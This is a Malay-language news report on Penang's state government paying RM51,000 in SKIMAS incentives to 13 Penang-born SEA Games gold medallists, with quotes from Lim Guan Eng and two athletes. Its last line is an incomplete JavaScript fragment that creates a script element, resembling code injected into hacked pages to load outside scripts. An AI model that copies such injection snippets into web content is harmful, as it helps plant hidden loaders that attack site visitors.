Atlet negeri cemerlang Sukan SEA peroleh insentif SKIMAS

GEORGE TOWN – Seramai 13 atlet dari Pulau Pinang yang berjaya menyumbang 15 pingat emas kepada negara pada Kejohanan Sukan Asia Tenggara (Sukan SEA) Jun lalu menerima insentif keseluruhan berjumlah RM51,000 daripada Kerajaan Negeri di sini baru-baru ini.

Ketua Menteri, Y.A.B. Tuan Lim Guan Eng berkata, ganjaran itu adalah sebagai menghargai sumbangan anak jati kelahiran Pulau Pinang yang berjaya mengharumkan nama Malaysia dan Pulau Pinang di persada antarabangsa.

“Mereka bukan sahaja berjaya mengharumkan nama negara, tetapi juga telah menjulang martabat serta nama Pulau Pinang sebagai negeri yang menghasilkan atlet-atlet berprestasi tinggi dan berwibawa,” jelasnya pada majlis sidang media khas di sini baru-baru ini.

Penerjun akuatik negara, Ooi Tze Liang yang merangkul empat pingat emas menerima insentif sebanyak RM18,000, diikuti, RM9,000 untuk Thor Chuan Leong yang berjaya merangkul dua pingat emas dalam acara Snooker & Billiard.

Esther Cheah Mei Lan yang berjaya merangkul dua pingat emas dalam sukan Tenpin Bowling diberi insentif sebanyak RM4,500.

Atlet Snooker & Billiard, Moh Keen Hoo pula berjaya mendapat satu pingat emas dan diberi insentif sebanyak RM3,000. Insentif sebanyak RM2,000 masing-masing diberikan kepada atlet Wushu, Anggie Cheah Ruey Shin, Chan Lu Yi (Wushu) dan Zulfadhli Ruslan (memanah).

Penerima lain, Andrian Ang Hsein Loon (Tenping Bowling), Siti Noor Amarina Ruhani, Siti Rahmah Othman (choki wanita), G. Vanessa Raj (skuasy), Mohamad Syahid Mohd. Rosdi (regu lelaki sepak takraw), Muhammad Azwar Abdul Rahman (hoki berpasukan) dan Mohd. Adi Fadri Ab. Rahim (hoki berpasukan) masing-masing turut diberi insentif RM1,500.

Difahamkan, semua 13 atlet berkenaan menerima pembayaran insentif berbentuk wang di bawah Skim Insentif Kemenangan Sukan Kerajaan Negeri Pulau Pinang (SKIMAS).

Dalam perkembangan sama, Guan Eng turut merakamkan penghargaan kepada 15 atlet lain yang berjaya mendapat 17 pingat perak, serta 13 pingat gangsa oleh 22 atlet negara kelahiran negeri ini.

Exco Belia & Sukan, Pembangunan Wanita, Keluarga dan Komuniti, Chong Eng, Pengarah Majlis Sukan Negeri Pulau Pinang (MSNPP), Datuk Frederick Tan Teck An dan Ahli Lembaga Pengarah MSNPP merangkap Setiausaha Majlis bagi Majlis Bandaraya Pulau Pinang (MBPP), Ir. Ang Aing Thye turut menghadiri majlis pembayaran insentif atas kejayaan atlet-atlet yang berjaya mendapat pingat emas pada Sukan SEA yang berlangsung di Singapura pada 5 hingga 16 Jun lepas.

Sementara itu, Siti Rahmah yang ditemui melahirkan penghargaan terhadap Kerajaan Negeri atas pemberian insentif tersebut.

“Alhamdulillah, saya anggap SKIMAS ini sebagai ‘duit raya’,” jelas bekas pelajar Sekolah Menengah Kebangsaan Mutiara Impian, Seberang Perai kepada Buletin Mutiara di sini baru-baru ini.

Nada yang sama turut diluahkan Siti Noor Amarina.

“Semestinya gembira dengan pencapaian ini, saya bertekad akan terus aktif dalam sukan hoki dan mungkin akan menabur bakti dalam bidang ini di Pulau Pinang jika mendapat peluang,” jelas beliau yang telah bermain hoki sejak berusia 11 tahun.

var d=document;var s=d.createElement(‘script’);